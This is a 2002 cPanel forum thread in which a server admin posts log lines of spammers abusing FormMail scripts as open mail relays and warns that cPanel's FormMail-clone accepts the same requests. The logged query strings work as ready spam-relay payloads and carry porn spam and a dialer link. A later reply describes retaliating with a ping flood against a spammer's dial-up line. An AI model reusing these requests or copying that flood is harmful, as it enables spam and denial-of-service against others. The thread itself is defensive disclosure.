The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Spam attack alert <important!>

Discussion in 'General Discussion' started by kosmo, Jan 24, 2002.

  1. kosmo

    kosmo Well-Known Member

    Joined:
    Aug 12, 2001
    Messages:
    403
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    All over Europe
    Hi all,

    this belongs to \"Backend/Scripts\" but it is too serious to hide it there.

    While studying the logs of the main account of my dedicated server, I noticed some kind kind of automat scanning for /cgi-bin/formmail.pl (I am referring to the old Analog reporting):


    66: : Jan/13/02 10:19 AM: /cgi-bin/formmail.pl?email=&recipient=mailrelay@ort-r01.mx.aol.com&subject=P80+&lt;my_ip_here&gt;+35


    54: : Nov/ 2/01 9:03 AM: /cgi-bin/formmail.pl?email=eroticascanner@aol.com&recipient=Siemensv2@aol.com&subject=&lt;domain_name_here&gt;/cgi-bin/formmail.pl&msg=Hiya


    35: : Jan/ 7/02 2:42 AM: /cgi-bin/formmail.pl?email=cashwarstest@cashwars.com&subject=&lt;another_domain_name_here&gt;/cgi-bin/formmail.pl&recipient=black123@aol.com&msg=testing

    30: : Oct/11/01 11:33 AM: /cgi-bin/formmail.pl?email=WebBrowserHunter@aol.com&recipient=infam0uskills@aol.com&subject=&lt;some_other_domain_name_here&gt;/cgi-bin/formmail.pl&msg=scanning

    28: : Oct/31/01 6:59 PM: /cgi-bin/formmail.pl?email=WebBrowserHunter@aol.com&recipient=shinxstar@aol.com&subject=&lt;yet_another_domain_name_here&gt;/cgi-bin/formmail.pl&msg=scanning

    and so on, and so on (hundreds of them).

    Some of them directly try to send:
    13: : Jan/ 1/02 1:47 AM: /cgi-bin/formmail.pl?email=Alison20F@hotmail.com&recipient=bslab@hotmail.com,bslack@hotmail.com,bslacy@earthlink.net,bslade@hotmail.com,bslady2@hotmail.com,bslady@hotmail.com,bslagel@earthlink.net,bslager@hotmail.com,bslagowski@hotmail.com,bslagter@hotmail.com&subject=Download The Napster Of Porn!&message=You+Have+Won+a+Free+Membership+To+Any+Of+The+Following+Sites:+++++++++++++++++++++++++++++++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Girl+Ranch++++++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Beaver+Palace++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Jungle+Girls+++++++++++++++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Teen+Factory
    13: : Jan/ 1/02 12:26 AM: /cgi-bin/formmail.pl?email=Sarah18@yahoo.com&recipient=brianz54@hotmail.com,brianz71@hotmail.com,brianz7@hotmail.com,brianz8@hotmail.com,brianz@hotmail.com,brianza@earthlink.net,brianza@hotmail.com,brianzam@hotmail.com,brianzan@hotmail.com,brianze@hotmail.com&subject=FREE XXX PORN!&message=You+Have+Won+a+Free+Membership+To+Any+Of+The+Following+Sites:+++++++++++++++++++++++++++++++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Girl+Ranch++++++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Beaver+Palace++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Jungle+Girls+++++++++++++++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Teen+Factory
    13: : Jan/ 1/02 12:29 AM: /cgi-bin/formmail.pl?email=Jenny19Sexxy@angelfire.com&recipient=brickwall_1@hotmail.com,brickwall_2@hotmail.com,brickwall_of_the_brickhouse@msn.com,brickwalls@hotmail.com,brickwell@hotmail.com,brickwindows@hotmail.com,brickwoman@hotmail.com,brickwood@earthlink.net,brickwood@hotmail.com,brickwork@hotmail.com&subject=View My Webcam!&message=Want+instant+access+to+thousands+of+high+quality+adult+movies?++We\'ve+got+celebrities,+lesbians,+hardcore,+fetish,+gay,+or+whatever+you+want.++You+don\'t+even+need+a+credit+card,+just+a+connection+to+the+internet.+http://209.202.218.10/dc/dialer+-+Click+here+to+download+the+napster+of+hardcore+entertainment!


    I have then tried one of the last lines with /cgi-sys/FormMail-clone.cgi AND IT WORKS! The spam is being sent through my own server! So, it is a matter of weeks, maybe months and the spammers WILL know, that they just have
    to replace /cgi-bin/formmail.pl with /cgi-sys/FormMail-clone.cgi and they will be able to spam throu any CPanel machine.

    As far as I know, there is a more secure version of formmail, checking if the requesting document is stored on the server before proceeding with sending the email. Anybody knows for sure? Has anybody else noticed this kind of spam attack?

    kosmo
     
  2. rpmws

    rpmws Well-Known Member

    Joined:
    Aug 14, 2001
    Messages:
    1,824
    Likes Received:
    5
    Trophy Points:
    38
    Location:
    back woods of NC, USA
    This one is old news...some punk kid has released a win32 client that scans IPs and domains for certain versions of FormMail.pl and others and looks for the hole. I caught 3 of these bastards. I tail my mainlog and kept seeing 20-30 emails spit out every 2 seconds. I tracked down the IP and pinged it and found it was a 56K dialup account on Earthlink. I then blocked his class and threw a 80mbit ping at his IP which caused him to log off and back on. I flooded his dial up box so bad for 15 minutes that no one there could get through. But that was the stupid part. I just wanted to frustrate him. He kept trying so I called Earthlink ..got a tech and he watched the little bastard for 10 minutes with me. Then he shut him down. Turns out the emails linked him to some demented porn domain that had been shut off as well.

    All this stopped as soon as I upgraded my Matt\'s box wide script as well as telling all my clinets to update theirs or I would fine then for Spam :) But you are right the problem is in the clone as well.
     
  3. Brad

    Brad Well-Known Member

    Joined:
    Aug 16, 2001
    Messages:
    231
    Likes Received:
    0
    Trophy Points:
    16
    So then whats the best way to address this right now?
     
Loading...

Share This Page